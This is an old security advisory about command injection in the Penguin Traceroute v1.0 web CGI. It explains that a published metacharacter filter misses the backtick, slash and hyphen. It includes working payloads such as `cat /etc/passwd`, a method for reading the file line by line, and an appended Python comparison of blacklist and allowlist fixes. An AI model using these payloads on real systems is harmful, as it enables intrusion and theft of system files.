COMMAND

    Penguin Traceroute remote command execution

SYSTEMS AFFECTED

    v1.0

PROBLEM

    Marco van Berkum [m.v.berkum@obit.nl] posted the following, regarding a web interface for traceroute, Penguin Traceroute:

    As I was surfing through some older Securityfocus archives I stumbled across the article about Penguin traceroute v1.0

        http://online.securityfocus.com/archive/1/263285

    This article described some metacharacter bugs in this CGI script; it also included a suggested fix.

    <quote>
    Fix
    ===
    Open up the perl script in your favorite text editor, find a line that has "$host = $q->param('host');". It's usually the 13th line down. Then just add this line "$host =~ s/[;<>\*\|'&\$!?#\(\)\[\]\{\}:'"\\]//g;" under it and that should parse out any unwanted characters.
    </quote>

    Well, yes, it does parse out some metacharacters, but the " ` " (backtick) is not filtered out in any way (probably one of the two quotes " ' " should be a backtick). Also the slash and the hyphen are not filtered.

    Example
    =======

    Entering `cat /etc/passwd` gives us:

        Taceroute to `cat /etc/passwd`
        traceroute: unknown host root:*:0:0:Charlie

    This is only the first line because only that one gets interpreted by traceroute. But there are ways around this to retrieve the full file with some patience:

        Taceroute to `wc -l /etc/passwd`
        traceroute to 18 (0.0.0.18), 64 hops max, 40 byte packets

    So we see that in this case the passwd file is 18 lines big. We could retrieve the rest by doing tail -n 18 /etc/passwd, tail -n 17 etc.. etc..

SOLUTION

    Replace the second quote by a backtick and add slash and hyphen to the filter.
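As an added illustration (not code from the advisory or from the Penguin Traceroute script), the Python below transliterates the post's original and corrected blacklists and contrasts them with an allowlist check plus a shell-free argv, so a reviewer can see why the backtick passes the first filter and why validating the hostname is the more robust fix; the function names and sample inputs are my own.

```python
import re

# Advisory's original blacklist, transliterated from the Perl substitution
# (the quote character appears twice; backtick, slash and hyphen are absent).
ORIGINAL_FILTER = re.compile(r"""[;<>*|'&$!?#()\[\]{}:'"\\]""")

# Advisory's corrected blacklist: second quote replaced by a backtick,
# slash and hyphen added.
CORRECTED_FILTER = re.compile(r"""[;<>*|'&$!?#()\[\]{}:`"\\/-]""")


def strip_metachars(host: str, pattern: re.Pattern = CORRECTED_FILTER) -> str:
    """Blacklist approach: delete whatever the pattern matches, keep the rest."""
    return pattern.sub("", host)


# Allowlist alternative (my addition, not from the advisory): accept only a
# syntactically valid hostname or dotted IPv4 address, so nothing is silently
# stripped and mangled. A hyphen is legal inside a label but never leading,
# which also keeps the value from being parsed as a traceroute option.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def is_valid_host(host: str) -> bool:
    return 0 < len(host) <= 253 and HOSTNAME_RE.match(host) is not None


def traceroute_argv(host: str) -> list[str]:
    """Build argv for traceroute. Run it with subprocess.run(argv), i.e. without
    a shell: the Perl script's backtick/system-string call is what let shell
    metacharacters in the CGI parameter be interpreted at all."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["traceroute", host]


if __name__ == "__main__":
    # constructed sample inputs
    for sample in ("www.example.com", "`cat /etc/passwd`", "-n"):
        print(f"{sample!r}: original -> {strip_metachars(sample, ORIGINAL_FILTER)!r}, "
              f"corrected -> {strip_metachars(sample)!r}, allowlist -> {is_valid_host(sample)}")
```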